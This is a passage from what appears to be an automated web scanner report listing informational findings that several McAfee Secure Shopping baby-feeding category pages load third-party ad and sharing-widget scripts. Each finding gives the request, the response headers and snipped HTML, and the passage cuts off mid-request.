<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Skin Care at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.47. http://secureshopping.mcafee.com/browse/baby/feeding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:12 GMT
Content-Length: 62468

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Nursing & Feeding at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.48. http://secureshopping.mcafee.com/browse/baby/feeding/baby-food-grinders/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/baby-food-grinders/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/baby-food-grinders/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:14 GMT
Content-Length: 45076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby Food Grinders at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.49. http://secureshopping.mcafee.com/browse/baby/feeding/baby-food/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/baby-food/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/baby-food/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:12 GMT
Content-Length: 56306

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby Food at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.50. http://secureshopping.mcafee.com/browse/baby/feeding/bibs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/bibs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/bibs/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:14 GMT
Content-Length: 60495

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bibs at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.51. http://secureshopping.mcafee.com/browse/baby/feeding/bottles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/bottles/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/bottles/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:15 GMT
Content-Length: 62115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bottles at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.52. http://secureshopping.mcafee.com/browse/baby/feeding/breast-pumps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/breast-pumps/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/breast-pumps/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:17 GMT
Content-Length: 67971

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Breast Pumps at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.53. http://secureshopping.mcafee.com/browse/baby/feeding/formula/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/formula/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/formula/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:17 GMT
Content-Length: 60949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Formula at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.54. http://secureshopping.mcafee.com/browse/baby/feeding/milk-storage-bags/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/milk-storage-bags/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/milk-storage-bags/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:29 GMT
Content-Length: 16756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Milk Storage Bags at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.55. http://secureshopping.mcafee.com/browse/baby/feeding/nipples/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nipples/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/nipples/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:29 GMT
Content-Length: 51208

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Nipples at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.56. http://secureshopping.mcafee.com/browse/baby/feeding/nursing-apparel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/feeding/nursing-apparel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/feeding/nursing-apparel/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
